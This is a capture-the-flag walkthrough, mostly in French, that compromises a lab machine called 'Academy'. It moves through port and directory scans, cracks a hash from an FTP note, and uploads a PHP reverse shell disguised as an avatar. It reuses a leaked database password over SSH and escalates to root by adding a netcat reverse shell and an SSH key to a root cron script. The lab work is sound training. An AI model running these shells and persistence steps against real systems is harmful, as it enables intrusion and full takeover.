nmap -Pn 192.168.20.111 -sV
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-20 11:29 CEST
Nmap scan report for 192.168.20.111
Host is up (0.0064s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.00 seconds
ftp://192.168.20.111/ http://192.168.20.111/
gobuster dir -u http://192.168.20.111 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.20.111
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/10/20 11:38:50 Starting gobuster in directory enumeration mode
===============================================================
/academy (Status: 301) [Size: 318] [--> http://192.168.20.111/academy/]
/phpmyadmin (Status: 301) [Size: 321] [--> http://192.168.20.111/phpmyadmin/]
/server-status (Status: 403) [Size: 279]
===============================================================
2021/10/20 11:39:45 Finished
===============================================================
ftp://192.168.20.111/note.txt
Grimmie has setup the test website for the new academy.
I told him not to use the same password everywhere, he will change it ASAP.
I couldn't create a user via the admin panel, so instead I inserted directly into the database with the following command:
INSERT INTO `students` (`StudentRegno`, `studentPhoto`, `password`, `studentName`, `pincode`, `session`, `department`, `semester`, `cgpa`, `creationdate`, `updationDate`) VALUES
('10201321', '', 'cd73502828457d15655bbd7a63fb0bc8', 'Rum Ham', '777777', '', '', '', '7.60', '2021-05-29 14:36:56', '');
The StudentRegno number is what you use for login.
Le me know what you think of this open-source project, it's from 2020 so it should be secure... right ?
We can always adapt it to our needs.
-jdelta
~
┌──(tbr㉿kali-tbr)-[~]
└─$ gobuster dir -u http://192.168.20.111/academy -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.20.111/academy
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/10/20 11:45:03 Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 324] [--> http://192.168.20.111/academy/admin/]
/assets (Status: 301) [Size: 325] [--> http://192.168.20.111/academy/assets/]
/includes (Status: 301) [Size: 327] [--> http://192.168.20.111/academy/includes/]
/db (Status: 301) [Size: 321] [--> http://192.168.20.111/academy/db/]
===============================================================
2021/10/20 11:46:13 Finished
===============================================================
cd73502828457d15655bbd7a63fb0bc8 -> student
http://192.168.20.111/academy/ Connexion avec l’utilisateur et upload d’une image afin d’executer un code encapsulé dans du PHP à la place de l’image. https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php On met en attente un terminal avec la commande : nc -nlvp 1234 qui va ecouter sur le port 1234 [Netcat - utilisa pour ouvrir des ports et faire de la communication entre machine] On modifie le fichier pour le faire pointer vers notre IP. et on l’upload à la place de l’image avatar du compte
┌──(tbr㉿kali-tbr)-[~]
└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.20.103] from (UNKNOWN) [192.168.20.111] 51562
Linux academy 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
08:17:43 up 2:54, 1 user, load average: 0.05, 0.04, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - 05:23 2:51m 0.06s 0.04s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty;pty.spawn('/bin/bash')" || python -c "import pty;pty.spawn('/bin/bash')"
www-data@academy:/$
www-data@academy:/home$ cd /tmp
cd /tmp
www-data@academy:/tmp$ ls
ls
www-data@academy:/tmp$ ll
ll
bash: ll: command not found
www-data@academy:/tmp$ ls -al
ls -al
total 8
drwxrwxrwt 2 root root 4096 Oct 20 08:17 .
drwxr-xr-x 18 root root 4096 May 29 13:02 ..
www-data@academy:/tmp$ wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh
<.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh
--2021-10-20 08:51:34-- https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.108.133, 185.199.111.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 477235 (466K) [text/plain]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[===================>] 466.05K --.-KB/s in 0.1s
2021-10-20 08:51:40 (4.69 MB/s) - ‘linpeas.sh’ saved [477235/477235]
www-data@academy:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@academy:/tmp$ ./linpeas.sh
linpeas indique qu’il y a une vulnérabilité sur une tache CRON qui execute en root un fichier backup.sh toutes les minutes
rm /tmp/backup.zip
zip -r /tmp/backup.zip /var/www/html/academy/includes
chmod 700 /tmp/backup.zip
On va dans le fichier includes pour voir si il y a des informations utiles
$ cd var/www/html/academy/includes
$ ls
config.php
footer.php
header.php
menubar.php
$ cat config.php
<?php
$mysql_hostname = "localhost";
$mysql_user = "grimmie";
$mysql_password = "My_V3ryS3cur3_P4ss";
$mysql_database = "onlinecourse";
$bd = mysqli_connect($mysql_hostname, $mysql_user, $mysql_password, $mysql_database) or die("Could not connect database");
?>
Connexion en SSH avec le compte grimmie qui est aussi le mot de passe du compte local. On édite le fichier backup.sh pour qu’il execute une commande permettant d’ouvrir un shell distant via netcat
netcat -e /bin/sh 192.168.20.103 1234
Sur Kali on ouvre également une connexion en attente qui sera appelé par la machine distante lors de la prochaine execution de la tache CRON.
nc -nlvp 1234
Une autre solution est de générer sur Kali une clé SSH et d’envoyer la clé publique dans ssh_id de root
└─$ ssh-keygen -t rsa
└─$ cat .ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC2N7kG1Xj0NsXVs/RUsrBEHsYadG+Xxz8ooePtQ6BTv9zf87uewSVG5ND+D5PlMBvffbJTUKDF24g40iFDWkJmef/FMH56tK3FjPXLzKzVvP4CVVw5L81k+hvmOiAn38x/MG0vPMe1S828TtUKTHKDn+M4V5pvXLR7qkOb0QAgsD6VayWI5s4dS6spRUImLdExIUqhksTsizAMXkG0HSzVoefUZ6U5GBa9nr96LS2NIFG4lZUiZlFp0HMYX8zAruV0IsCNZMzfLjzLfkpiFTIjIetRgOe9IG3c21D1vqZkMpba3e3lnfmeCLRVOhfi4wJV9PH6yrnep1+83abkYsjeB2NBqF4al+3HP+0JuHGeN93ZoasayylFSwPGy195khOzjR6MSrqPvhraxm29pSkDlhqinBjwCRzzne3TdqGI5uXnEOYUVRAPqwh9w7bQVJ4a16oIq5xpvFyJJSIj0N5P5SBePfq+SboMR89aalFxjGIwdUJPdOC4Gyhg5O9od5E= tbr@kali-tbr
Puis on édite le fichier backup.sh pour intégrer l’implémentation de la clé dans le configuration SSH de la machine distante.
#création du repertoire car il n'existe pas
mkdir /root/.ssh
# Implémentation de la clé
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC2N7kG1Xj0NsXVs/RUsrBEHsYadG+Xxz8ooePtQ6BTv9zf87uewSVG5ND+D5PlMBvffbJTUKDF24g40iFDWkJmef/FMH56tK3FjPXLzKzVvP4CVVw5L81k+hvmOiAn38x/MG0vPMe1S828TtUKTHKDn+M4V5pvXLR7qkOb0QAgsD6VayWI5s4dS6spRUImLdExIUqhksTsizAMXkG0HSzVoefUZ6U5GBa9nr96LS2NIFG4lZUiZlFp0HMYX8zAruV0IsCNZMzfLjzLfkpiFTIjIetRgOe9IG3c21D1vqZkMpba3e3lnfmeCLRVOhfi4wJV9PH6yrnep1+83abkYsjeB2NBqF4al+3HP+0JuHGeN93ZoasayylFSwPGy195khOzjR6MSrqPvhraxm29pSkDlhqinBjwCRzzne3TdqGI5uXnEOYUVRAPqwh9w7bQVJ4a16oIq5xpvFyJJSIj0N5P5SBePfq+SboMR89aalFxjGIwdUJPdOC4Gyhg5O9od5E= tbr@kali-tbr" >> ~/.ssh/authorized_keys
# modification de la config SSH pours'assurer que l'on peut utiliser une clé publique pour se connecter
sed -i "s/#PubkeyAuthentication yes/PubkeyAuthentication yes/" /etc/ssh/sshd_config
# Mise en place d'un flag pour s'assurer que le script est bien passé via un echo sur netcat
echo "Connexion OK " | netcat 192.168.20.103 1234
TADAM !
┌──(tbr㉿kali-tbr)-[/var]
└─$ nc -nlvp 1234 1 ⨯
listening on [any] 1234 ...
connect to [192.168.20.103] from (UNKNOWN) [192.168.20.111] 51580
ls
flag.txt
cat flag.txt
Congratz you rooted this box !
Looks like this CMS isn't so secure...
I hope you enjoyed it.
If you had any issue please let us know in the course discord.
Happy hacking !